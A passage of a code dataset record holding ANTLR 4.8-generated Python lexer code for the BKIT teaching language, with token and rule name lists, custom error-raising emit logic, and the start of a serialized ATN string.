\"STAR_INT\", \n \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \n \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \n \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PARENT\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\" ]\n\n ruleNames = [ \"REAL_NUMBER\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \n \"COMMENT\", \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\", \n \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \"DIGIT\", \"LETTER\", \n \"SIGN\", \"SCIENTIFIC\", \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \n \"ILL_ESC_SEQUENCE\", \"SUP_ESC_SEQUENCE\", \"DOUBLE_QUOTE_IN_STRING\", \n \"STRING_CHAR\", \"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \"HEXADECIMAL\", \n \"DECIMAL\", \"OCTAL\", \"Integer_literal\", \"Float_literal\", \n \"Boolean_literal\", \"String_literal\", \"BODY\", \"BREAK\", \n \"CONTINUE\", \"DO\", \"ELSE\", \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \n \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \n \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \n \"STAR_INT\", \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \n \"NOT\", \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \n \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \"LESS_OR_EQUAL_FLOAT\", \n \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \"RIGHT_PARENT\", \n \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \n \"COLON\", \"DOT\", \"SEMI\", \"COMMA\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n def emit(self):\n tk = self.type\n result = super().emit()\n if tk == self.UNCLOSE_STRING: \n raise UncloseString(result.text)\n elif tk == self.ILLEGAL_ESCAPE:\n raise IllegalEscape(result.text)\n elif tk == self.ERROR_CHAR:\n raise ErrorToken(result.text)\n elif tk == self.UNTERMINATED_COMMENT:\n raise UnterminatedComment()\n else:\n return result;\n\n\n def action(self, localctx:RuleContext, ruleIndex:int, actionIndex:int):\n if self._actions is None:\n actions = dict()\n actions[3] = self.UNCLOSE_STRING_action \n actions[28] = self.String_literal_action \n self._actions = actions\n action = self._actions.get(ruleIndex, None)\n if action is not None:\n action(localctx, actionIndex)\n else:\n raise Exception(\"No registered action for:\" + str(ruleIndex))\n\n\n def UNCLOSE_STRING_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 0:\n\n y = self.text;\n self.text = y[1:]\n \n \n\n def String_literal_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 1:\n\n y = str(self.text)\n self.text = y[1:-1]\n \n \n\n\n" }, { "alpha_fraction": 0.2957708537578583, "alphanum_fraction": 0.5650569796562195, "avg_line_length": 59.24412155151367, "blob_id": "e9f8279689fc702586ef3d08f2bc93a73f9b25c0", "content_id": "577bf2465a157ed7b0af111577386c3e0f3b1892", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33340, "license_type": "no_license", "max_line_length": 103, "num_lines": 553, "path": "/Assignments/assignment1/src/forJava/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\nfrom lexererr import *\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2S\")\n buf.write(\"\\u02ed\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\4,\\t,\\4-\\t-\\4.\")\n buf.write(\"\\t.\\4/\\t/\\4\\60\\t\\60\\4\\61\\t\\61\\4\\62\\t\\62\\4\\63\\t\\63\\4\\64\")\n buf.write(\"\\t\\64\\4\\65\\t\\65\\4\\66\\t\\66\\4\\67\\t\\67\\48\\t8\\49\\t9\\4:\\t:\")\n buf.write(\"\\4;\\t;\\4<\\t<\\4=\\t=\\4>\\t>\\4?\\t?\\4@\\t@\\4A\\tA\\4B\\tB\\4C\\t\")\n buf.write(\"C\\4D\\tD\\4E\\tE\\4F\\tF\\4G\\tG\\4H\\tH\\4I\\tI\\4J\\tJ\\4K\\tK\\4L\\t\")\n buf.write(\"L\\4M\\tM\\4N\\tN\\4O\\tO\\4P\\tP\\4Q\\tQ\\4R\\tR\\4S\\tS\\4T\\tT\\4U\\t\")\n buf.write(\"U\\4V\\tV\\4W\\tW\\4X\\tX\\4Y\\tY\\4Z\\tZ\\4[\\t[\\4\\\\\\t\\\\\\4]\\t]\\4\")\n buf.write(\"^\\t^\\4_\\t_\\4`\\t`\\4a\\ta\\4b\\tb\\3\\2\\3\\2\\3\\2\\3\\2\\3\\2\\7\\2\\u00cb\")\n buf.write(\"\\n\\2\\f\\2\\16\\2\\u00ce\\13\\2\\3\\3\\3\\3\\3\\3\\3\\3\\3\\3\\3\\3\\3\\3\\3\")\n buf.write(\"\\3\\3\\3\\3\\3\\3\\3\\5\\3\\u00db\\n\\3\\3\\4\\3\\4\\5\\4\\u00df\\n\\4\\3\\5\")\n buf.write(\"\\3\\5\\3\\5\\3\\5\\5\\5\\u00e5\\n\\5\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\5\\6\\u00ec\")\n buf.write(\"\\n\\6\\3\\7\\3\\7\\3\\b\\3\\b\\5\\b\\u00f2\\n\\b\\3\\t\\3\\t\\3\\n\\3\\n\\3\\13\")\n buf.write(\"\\3\\13\\3\\f\\3\\f\\5\\f\\u00fc\\n\\f\\3\\r\\3\\r\\3\\r\\5\\r\\u0101\\n\\r\")\n buf.write(\"\\3\\r\\6\\r\\u0104\\n\\r\\r\\r\\16\\r\\u0105\\3\\16\\3\\16\\7\\16\\u010a\")\n buf.write(\"\\n\\16\\f\\16\\16\\16\\u010d\\13\\16\\3\\17\\6\\17\\u0110\\n\\17\\r\\17\")\n buf.write(\"\\16\\17\\u0111\\3\\17\\3\\17\\5\\17\\u0116\\n\\17\\3\\17\\5\\17\\u0119\")\n buf.write(\"\\n\\17\\3\\20\\3\\20\\3\\20\\3\\21\\3\\21\\3\\21\\3\\22\\3\\22\\3\\22\\3\\23\")\n buf.write(\"\\3\\23\\3\\23\\5\\23\\u0127\\n\\23\\3\\24\\3\\24\\3\\25\\3\\25\\3\\26\\3\")\n buf.write(\"\\26\\3\\26\\3\\26\\5\\26\\u0131\\n\\26\\3\\26\\3\\26\\7\\26\\u0135\\n\\26\")\n buf.write(\"\\f\\26\\16\\26\\u0138\\13\\26\\3\\27\\3\\27\\3\\27\\7\\27\\u013d\\n\\27\")\n buf.write(\"\\f\\27\\16\\27\\u0140\\13\\27\\5\\27\\u0142\\n\\27\\3\\30\\3\\30\\3\\30\")\n buf.write(\"\\3\\30\\5\\30\\u0148\\n\\30\\3\\30\\3\\30\\7\\30\\u014c\\n\\30\\f\\30\\16\")\n buf.write(\"\\30\\u014f\\13\\30\\3\\31\\3\\31\\3\\31\\5\\31\\u0154\\n\\31\\3\\32\\3\")\n buf.write(\"\\32\\3\\33\\3\\33\\5\\33\\u015a\\n\\33\\3\\34\\3\\34\\7\\34\\u015e\\n\\34\")\n buf.write(\"\\f\\34\\16\\34\\u0161\\13\\34\\3\\34\\3\\34\\3\\34\\3\\35\\3\\35\\3\\35\")\n buf.write(\"\\3\\35\\3\\35\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\37\\3\\37\\3\\37\")\n buf.write(\"\\3\\37\\3\\37\\3\\37\\3\\37\\3\\37\\3\\37\\3 \\3 \\3 \\3!\\3!\\3!\\3!\\3\")\n buf.write(\"!\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3#\\3#\\3#\\3#\\3#\\3#\\3$\\3$\")\n buf.write(\"\\3$\\3$\\3$\\3$\\3$\\3$\\3%\\3%\\3%\\3%\\3%\\3%\\3%\\3&\\3&\\3&\\3&\\3\")\n buf.write(\"&\\3&\\3&\\3&\\3&\\3\\'\\3\\'\\3\\'\\3\\'\\3(\\3(\\3(\\3(\\3(\\3(\\3(\\3(\")\n buf.write(\"\\3(\\3)\\3)\\3)\\3*\\3*\\3*\\3*\\3*\\3*\\3*\\3*\\3*\\3*\\3+\\3+\\3+\\3\")\n buf.write(\"+\\3+\\3+\\3+\\3,\\3,\\3,\\3,\\3,\\3-\\3-\\3-\\3-\\3.\\3.\\3.\\3.\\3.\\3\")\n buf.write(\".\\3/\\3/\\3/\\3/\\3/\\3\\60\\3\\60\\3\\60\\3\\60\\3\\60\\3\\60\\3\\61\\3\")\n buf.write(\"\\61\\3\\61\\3\\61\\3\\61\\3\\61\\3\\62\\3\\62\\3\\63\\3\\63\\3\\63\\3\\64\")\n buf.write(\"\\3\\64\\3\\65\\3\\65\\3\\65\\3\\66\\3\\66\\3\\67\\3\\67\\3\\67\\38\\38\\3\")\n buf.write(\"9\\39\\39\\3:\\3:\\3;\\3;\\3<\\3<\\3<\\3=\\3=\\3=\\3>\\3>\\3>\\3?\\3?\\3\")\n buf.write(\"?\\3@\\3@\\3A\\3A\\3B\\3B\\3B\\3C\\3C\\3C\\3D\\3D\\3D\\3D\\3E\\3E\\3E\\3\")\n buf.write(\"F\\3F\\3F\\3G\\3G\\3G\\3G\\3H\\3H\\3H\\3H\\3I\\3I\\3J\\3J\\3K\\3K\\3L\\3\")\n buf.write(\"L\\3M\\3M\\3N\\3N\\3O\\3O\\3P\\3P\\3Q\\3Q\\3R\\3R\\3S\\3S\\3T\\3T\\3U\\3\")\n buf.write(\"U\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3V\\3V\\3V\\3V\\3V\\3V\\3\")\n buf.write(\"V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3W\\3W\\3W\\3W\\3W\\3W\\3W\\3W\\3W\\3W\\3\")\n buf.write(\"W\\3W\\3W\\3X\\3X\\3X\\3X\\3X\\3X\\3X\\3X\\3X\\3X\\3X\\3X\\3X\\3X\\3X\\3\")\n buf.write(\"X\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Z\\3Z\\3\")\n buf.write(\"Z\\3Z\\3Z\\3Z\\3Z\\3Z\\3Z\\3Z\\3Z\\3Z\\3Z\\3Z\\3Z\\3[\\3[\\3[\\3[\\3[\\3\")\n buf.write(\"[\\3[\\3[\\3[\\3[\\3[\\3[\\3[\\3[\\3\\\\\\3\\\\\\3\\\\\\3\\\\\\3\\\\\\3\\\\\\3\\\\\")\n buf.write(\"\\3\\\\\\3\\\\\\3\\\\\\3\\\\\\3\\\\\\3\\\\\\3\\\\\\3\\\\\\3\\\\\\3]\\3]\\3]\\3]\\7]\\u02b8\")\n buf.write(\"\\n]\\f]\\16]\\u02bb\\13]\\3]\\3]\\3]\\3]\\3]\\3^\\6^\\u02c3\\n^\\r^\")\n buf.write(\"\\16^\\u02c4\\3^\\3^\\3_\\3_\\7_\\u02cb\\n_\\f_\\16_\\u02ce\\13_\\3\")\n buf.write(\"_\\3_\\3_\\3`\\3`\\7`\\u02d5\\n`\\f`\\16`\\u02d8\\13`\\3`\\5`\\u02db\")\n buf.write(\"\\n`\\3`\\3`\\3a\\3a\\3a\\3a\\3a\\3a\\7a\\u02e5\\na\\fa\\16a\\u02e8\\13\")\n buf.write(\"a\\3a\\3a\\3b\\3b\\4\\u02b9\\u02e6\\2c\\3\\3\\5\\4\\7\\5\\t\\6\\13\\7\\r\")\n buf.write(\"\\b\\17\\t\\21\\2\\23\\2\\25\\2\\27\\2\\31\\2\\33\\2\\35\\2\\37\\2!\\2#\\2\")\n buf.write(\"%\\2\\'\\2)\\2+\\2-\\2/\\2\\61\\n\\63\\13\\65\\f\\67\\r9\\16;\\17=\\20?\")\n buf.write(\"\\21A\\22C\\23E\\24G\\25I\\26K\\27M\\30O\\31Q\\32S\\33U\\34W\\35Y\\36\")\n buf.write(\"[\\37] _!a\\\"c#e$g%i&k\\'m(o)q*s+u,w-y.{/}\\60\\177\\61\\u0081\")\n buf.write(\"\\62\\u0083\\63\\u0085\\64\\u0087\\65\\u0089\\66\\u008b\\67\\u008d\")\n buf.write(\"8\\u008f9\\u0091:\\u0093;\\u0095<\\u0097=\\u0099>\\u009b?\\u009d\")\n buf.write(\"@\\u009fA\\u00a1B\\u00a3C\\u00a5D\\u00a7E\\u00a9F\\u00abG\\u00ad\")\n buf.write(\"H\\u00afI\\u00b1J\\u00b3K\\u00b5L\\u00b7M\\u00b9N\\u00bbO\\u00bd\")\n buf.write(\"P\\u00bfQ\\u00c1R\\u00c3S\\3\\2\\22\\3\\2c|\\3\\2C\\\\\\3\\2\\62;\\4\\2\")\n buf.write(\"GGgg\\3\\2\\60\\60\\t\\2))^^ddhhppttvv\\7\\2\\n\\f\\16\\17$$))^^\\4\")\n buf.write(\"\\2\\62;CH\\3\\2\\629\\4\\2\\63;CH\\3\\2\\62\\62\\3\\2\\63;\\3\\2\\639\\5\")\n buf.write(\"\\2\\13\\f\\16\\17\\\"\\\"\\4\\3\\n\\f\\16\\17\\3\\2,,\\2\\u030d\\2\\3\\3\\2\")\n buf.write(\"\\2\\2\\2\\5\\3\\2\\2\\2\\2\\7\\3\\2\\2\\2\\2\\t\\3\\2\\2\\2\\2\\13\\3\\2\\2\\2\")\n buf.write(\"\\2\\r\\3\\2\\2\\2\\2\\17\\3\\2\\2\\2\\2\\61\\3\\2\\2\\2\\2\\63\\3\\2\\2\\2\\2\")\n buf.write(\"\\65\\3\\2\\2\\2\\2\\67\\3\\2\\2\\2\\29\\3\\2\\2\\2\\2;\\3\\2\\2\\2\\2=\\3\\2\")\n buf.write(\"\\2\\2\\2?\\3\\2\\2\\2\\2A\\3\\2\\2\\2\\2C\\3\\2\\2\\2\\2E\\3\\2\\2\\2\\2G\\3\")\n buf.write(\"\\2\\2\\2\\2I\\3\\2\\2\\2\\2K\\3\\2\\2\\2\\2M\\3\\2\\2\\2\\2O\\3\\2\\2\\2\\2Q\")\n buf.write(\"\\3\\2\\2\\2\\2S\\3\\2\\2\\2\\2U\\3\\2\\2\\2\\2W\\3\\2\\2\\2\\2Y\\3\\2\\2\\2\\2\")\n buf.write(\"[\\3\\2\\2\\2\\2]\\3\\2\\2\\2\\2_\\3\\2\\2\\2\\2a\\3\\2\\2\\2\\2c\\3\\2\\2\\2\")\n buf.write(\"\\2e\\3\\2\\2\\2\\2g\\3\\2\\2\\2\\2i\\3\\2\\2\\2\\2k\\3\\2\\2\\2\\2m\\3\\2\\2\")\n buf.write(\"\\2\\2o\\3\\2\\2\\2\\2q\\3\\2\\2\\2\\2s\\3\\2\\2\\2\\2u\\3\\2\\2\\2\\2w\\3\\2\")\n buf.write(\"\\2\\2\\2y\\3\\2\\2\\2\\2{\\3\\2\\2\\2\\2}\\3\\2\\2\\2\\2\\177\\3\\2\\2\\2\\2\")\n buf.write(\"\\u0081\\3\\2\\2\\2\\2\\u0083\\3\\2\\2\\2\\2\\u0085\\3\\2\\2\\2\\2\\u0087\")\n buf.write(\"\\3\\2\\2\\2\\2\\u0089\\3\\2\\2\\2\\2\\u008b\\3\\2\\2\\2\\2\\u008d\\3\\2\\2\")\n buf.write(\"\\2\\2\\u008f\\3\\2\\2\\2\\2\\u0091\\3\\2\\2\\2\\2\\u0093\\3\\2\\2\\2\\2\\u0095\")\n buf.write(\"\\3\\2\\2\\2\\2\\u0097\\3\\2\\2\\2\\2\\u0099\\3\\2\\2\\2\\2\\u009b\\3\\2\\2\")\n buf.write(\"\\2\\2\\u009d\\3\\2\\2\\2\\2\\u009f\\3\\2\\2\\2\\2\\u00a1\\3\\2\\2\\2\\2\\u00a3\")\n buf.write(\"\\3\\2\\2\\2\\2\\u00a5\\3\\2\\2\\2\\2\\u00a7\\3\\2\\2\\2\\2\\u00a9\\3\\2\\2\")\n buf.write(\"\\2\\2\\u00ab\\3\\2\\2\\2\\2\\u00ad\\3\\2\\2\\2\\2\\u00af\\3\\2\\2\\2\\2\\u00b1\")\n buf.write(\"\\3\\2\\2\\2\\2\\u00b3\\3\\2\\2\\2\\2\\u00b5\\3\\2\\2\\2\\2\\u00b7\\3\\2\\2\")\n buf.write(\"\\2\\2\\u00b9\\3\\2\\2\\2\\2\\u00bb\\3\\2\\2\\2\\2\\u00bd\\3\\2\\2\\2\\2\\u00bf\")\n buf.write(\"\\3\\2\\2\\2\\2\\u00c1\\3\\2\\2\\2\\2\\u00c3\\3\\2\\2\\2\\3\\u00c5\\3\\2\\2\")\n buf.write(\"\\2\\5\\u00da\\3\\2\\2\\2\\7\\u00de\\3\\2\\2\\2\\t\\u00e4\\3\\2\\2\\2\\13\")\n buf.write(\"\\u00eb\\3\\2\\2\\2\\r\\u00ed\\3\\2\\2\\2\\17\\u00f1\\3\\2\\2\\2\\21\\u00f3\")\n buf.write(\"\\3\\2\\2\\2\\23\\u00f5\\3\\2\\2\\2\\25\\u00f7\\3\\2\\2\\2\\27\\u00fb\\3\")\n buf.write(\"\\2\\2\\2\\31\\u00fd\\3\\2\\2\\2\\33\\u0107\\3\\2\\2\\2\\35\\u010f\\3\\2\")\n buf.write(\"\\2\\2\\37\\u011a\\3\\2\\2\\2!\\u011d\\3\\2\\2\\2#\\u0120\\3\\2\\2\\2%\\u0126\")\n buf.write(\"\\3\\2\\2\\2\\'\\u0128\\3\\2\\2\\2)\\u012a\\3\\2\\2\\2+\\u0130\\3\\2\\2\\2\")\n buf.write(\"-\\u0141\\3\\2\\2\\2/\\u0147\\3\\2\\2\\2\\61\\u0153\\3\\2\\2\\2\\63\\u0155\")\n buf.write(\"\\3\\2\\2\\2\\65\\u0159\\3\\2\\2\\2\\67\\u015b\\3\\2\\2\\29\\u0165\\3\\2\")\n buf.write(\"\\2\\2;\\u016a\\3\\2\\2\\2=\\u0170\\3\\2\\2\\2?\\u0179\\3\\2\\2\\2A\\u017c\")\n buf.write(\"\\3\\2\\2\\2C\\u0181\\3\\2\\2\\2E\\u0188\\3\\2\\2\\2G\\u018e\\3\\2\\2\\2\")\n buf.write(\"I\\u0196\\3\\2\\2\\2K\\u019d\\3\\2\\2\\2M\\u01a6\\3\\2\\2\\2O\\u01aa\\3\")\n buf.write(\"\\2\\2\\2Q\\u01b3\\3\\2\\2\\2S\\u01b6\\3\\2\\2\\2U\\u01c0\\3\\2\\2\\2W\\u01c7\")\n buf.write(\"\\3\\2\\2\\2Y\\u01cc\\3\\2\\2\\2[\\u01d0\\3\\2\\2\\2]\\u01d6\\3\\2\\2\\2\")\n buf.write(\"_\\u01db\\3\\2\\2\\2a\\u01e1\\3\\2\\2\\2c\\u01e7\\3\\2\\2\\2e\\u01e9\\3\")\n buf.write(\"\\2\\2\\2g\\u01ec\\3\\2\\2\\2i\\u01ee\\3\\2\\2\\2k\\u01f1\\3\\2\\2\\2m\\u01f3\")\n buf.write(\"\\3\\2\\2\\2o\\u01f6\\3\\2\\2\\2q\\u01f8\\3\\2\\2\\2s\\u01fb\\3\\2\\2\\2\")\n buf.write(\"u\\u01fd\\3\\2\\2\\2w\\u01ff\\3\\2\\2\\2y\\u0202\\3\\2\\2\\2{\\u0205\\3\")\n buf.write(\"\\2\\2\\2}\\u0208\\3\\2\\2\\2\\177\\u020b\\3\\2\\2\\2\\u0081\\u020d\\3\")\n buf.write(\"\\2\\2\\2\\u0083\\u020f\\3\\2\\2\\2\\u0085\\u0212\\3\\2\\2\\2\\u0087\\u0215\")\n buf.write(\"\\3\\2\\2\\2\\u0089\\u0219\\3\\2\\2\\2\\u008b\\u021c\\3\\2\\2\\2\\u008d\")\n buf.write(\"\\u021f\\3\\2\\2\\2\\u008f\\u0223\\3\\2\\2\\2\\u0091\\u0227\\3\\2\\2\\2\")\n buf.write(\"\\u0093\\u0229\\3\\2\\2\\2\\u0095\\u022b\\3\\2\\2\\2\\u0097\\u022d\\3\")\n buf.write(\"\\2\\2\\2\\u0099\\u022f\\3\\2\\2\\2\\u009b\\u0231\\3\\2\\2\\2\\u009d\\u0233\")\n buf.write(\"\\3\\2\\2\\2\\u009f\\u0235\\3\\2\\2\\2\\u00a1\\u0237\\3\\2\\2\\2\\u00a3\")\n buf.write(\"\\u0239\\3\\2\\2\\2\\u00a5\\u023b\\3\\2\\2\\2\\u00a7\\u023d\\3\\2\\2\\2\")\n buf.write(\"\\u00a9\\u023f\\3\\2\\2\\2\\u00ab\\u024c\\3\\2\\2\\2\\u00ad\\u025a\\3\")\n buf.write(\"\\2\\2\\2\\u00af\\u0267\\3\\2\\2\\2\\u00b1\\u0277\\3\\2\\2\\2\\u00b3\\u0286\")\n buf.write(\"\\3\\2\\2\\2\\u00b5\\u0295\\3\\2\\2\\2\\u00b7\\u02a3\\3\\2\\2\\2\\u00b9\")\n buf.write(\"\\u02b3\\3\\2\\2\\2\\u00bb\\u02c2\\3\\2\\2\\2\\u00bd\\u02c8\\3\\2\\2\\2\")\n buf.write(\"\\u00bf\\u02d2\\3\\2\\2\\2\\u00c1\\u02de\\3\\2\\2\\2\\u00c3\\u02eb\\3\")\n buf.write(\"\\2\\2\\2\\u00c5\\u00cc\\5\\21\\t\\2\\u00c6\\u00cb\\5\\21\\t\\2\\u00c7\")\n buf.write(\"\\u00cb\\5\\25\\13\\2\\u00c8\\u00cb\\5\\23\\n\\2\\u00c9\\u00cb\\7a\\2\")\n buf.write(\"\\2\\u00ca\\u00c6\\3\\2\\2\\2\\u00ca\\u00c7\\3\\2\\2\\2\\u00ca\\u00c8\")\n buf.write(\"\\3\\2\\2\\2\\u00ca\\u00c9\\3\\2\\2\\2\\u00cb\\u00ce\\3\\2\\2\\2\\u00cc\")\n buf.write(\"\\u00ca\\3\\2\\2\\2\\u00cc\\u00cd\\3\\2\\2\\2\\u00cd\\4\\3\\2\\2\\2\\u00ce\")\n buf.write(\"\\u00cc\\3\\2\\2\\2\\u00cf\\u00db\\5{>\\2\\u00d0\\u00db\\5}?\\2\\u00d1\")\n buf.write(\"\\u00db\\5\\177@\\2\\u00d2\\u00db\\5\\u0081A\\2\\u00d3\\u00db\\5\\u0083\")\n buf.write(\"B\\2\\u00d4\\u00db\\5\\u0085C\\2\\u00d5\\u00db\\5\\u0087D\\2\\u00d6\")\n buf.write(\"\\u00db\\5\\u0089E\\2\\u00d7\\u00db\\5\\u008bF\\2\\u00d8\\u00db\\5\")\n buf.write(\"\\u008dG\\2\\u00d9\\u00db\\5\\u008fH\\2\\u00da\\u00cf\\3\\2\\2\\2\\u00da\")\n buf.write(\"\\u00d0\\3\\2\\2\\2\\u00da\\u00d1\\3\\2\\2\\2\\u00da\\u00d2\\3\\2\\2\\2\")\n buf.write(\"\\u00da\\u00d3\\3\\2\\2\\2\\u00da\\u00d4\\3\\2\\2\\2\\u00da\\u00d5\\3\")\n buf.write(\"\\2\\2\\2\\u00da\\u00d6\\3\\2\\2\\2\\u00da\\u00d7\\3\\2\\2\\2\\u00da\\u00d8\")\n buf.write(\"\\3\\2\\2\\2\\u00da\\u00d9\\3\\2\\2\\2\\u00db\\6\\3\\2\\2\\2\\u00dc\\u00df\")\n buf.write(\"\\5w<\\2\\u00dd\\u00df\\5y=\\2\\u00de\\u00dc\\3\\2\\2\\2\\u00de\\u00dd\")\n buf.write(\"\\3\\2\\2\\2\\u00df\\b\\3\\2\\2\\2\\u00e0\\u00e5\\5e\\63\\2\\u00e1\\u00e5\")\n buf.write(\"\\5c\\62\\2\\u00e2\\u00e5\\5i\\65\\2\\u00e3\\u00e5\\5g\\64\\2\\u00e4\")\n buf.write(\"\\u00e0\\3\\2\\2\\2\\u00e4\\u00e1\\3\\2\\2\\2\\u00e4\\u00e2\\3\\2\\2\\2\")\n buf.write(\"\\u00e4\\u00e3\\3\\2\\2\\2\\u00e5\\n\\3\\2\\2\\2\\u00e6\\u00ec\\5k\\66\")\n buf.write(\"\\2\\u00e7\\u00ec\\5m\\67\\2\\u00e8\\u00ec\\5q9\\2\\u00e9\\u00ec\\5\")\n buf.write(\"o8\\2\\u00ea\\u00ec\\5s:\\2\\u00eb\\u00e6\\3\\2\\2\\2\\u00eb\\u00e7\")\n buf.write(\"\\3\\2\\2\\2\\u00eb\\u00e8\\3\\2\\2\\2\\u00eb\\u00e9\\3\\2\\2\\2\\u00eb\")\n buf.write(\"\\u00ea\\3\\2\\2\\2\\u00ec\\f\\3\\2\\2\\2\\u00ed\\u00ee\\5u;\\2\\u00ee\")\n buf.write(\"\\16\\3\\2\\2\\2\\u00ef\\u00f2\\5i\\65\\2\\u00f0\\u00f2\\5g\\64\\2\\u00f1\")\n buf.write(\"\\u00ef\\3\\2\\2\\2\\u00f1\\u00f0\\3\\2\\2\\2\\u00f2\\20\\3\\2\\2\\2\\u00f3\")\n buf.write(\"\\u00f4\\t\\2\\2\\2\\u00f4\\22\\3\\2\\2\\2\\u00f5\\u00f6\\t\\3\\2\\2\\u00f6\")\n buf.write(\"\\24\\3\\2\\2\\2\\u00f7\\u00f8\\t\\4\\2\\2\\u00f8\\26\\3\\2\\2\\2\\u00f9\")\n buf.write(\"\\u00fc\\5\\21\\t\\2\\u00fa\\u00fc\\5\\23\\n\\2\\u00fb\\u00f9\\3\\2\\2\")\n buf.write(\"\\2\\u00fb\\u00fa\\3\\2\\2\\2\\u00fc\\30\\3\\2\\2\\2\\u00fd\\u0100\\t\")\n buf.write(\"\\5\\2\\2\\u00fe\\u0101\\5g\\64\\2\\u00ff\\u0101\\5c\\62\\2\\u0100\\u00fe\")\n buf.write(\"\\3\\2\\2\\2\\u0100\\u00ff\\3\\2\\2\\2\\u0100\\u0101\\3\\2\\2\\2\\u0101\")\n buf.write(\"\\u0103\\3\\2\\2\\2\\u0102\\u0104\\5\\25\\13\\2\\u0103\\u0102\\3\\2\\2\")\n buf.write(\"\\2\\u0104\\u0105\\3\\2\\2\\2\\u0105\\u0103\\3\\2\\2\\2\\u0105\\u0106\")\n buf.write(\"\\3\\2\\2\\2\\u0106\\32\\3\\2\\2\\2\\u0107\\u010b\\t\\6\\2\\2\\u0108\\u010a\")\n buf.write(\"\\5\\25\\13\\2\\u0109\\u0108\\3\\2\\2\\2\\u010a\\u010d\\3\\2\\2\\2\\u010b\")\n buf.write(\"\\u0109\\3\\2\\2\\2\\u010b\\u010c\\3\\2\\2\\2\\u010c\\34\\3\\2\\2\\2\\u010d\")\n buf.write(\"\\u010b\\3\\2\\2\\2\\u010e\\u0110\\5\\25\\13\\2\\u010f\\u010e\\3\\2\\2\")\n buf.write(\"\\2\\u0110\\u0111\\3\\2\\2\\2\\u0111\\u010f\\3\\2\\2\\2\\u0111\\u0112\")\n buf.write(\"\\3\\2\\2\\2\\u0112\\u0118\\3\\2\\2\\2\\u0113\\u0115\\5\\33\\16\\2\\u0114\")\n buf.write(\"\\u0116\\5\\31\\r\\2\\u0115\\u0114\\3\\2\\2\\2\\u0115\\u0116\\3\\2\\2\")\n buf.write(\"\\2\\u0116\\u0119\\3\\2\\2\\2\\u0117\\u0119\\5\\31\\r\\2\\u0118\\u0113\")\n buf.write(\"\\3\\2\\2\\2\\u0118\\u0117\\3\\2\\2\\2\\u0119\\36\\3\\2\\2\\2\\u011a\\u011b\")\n 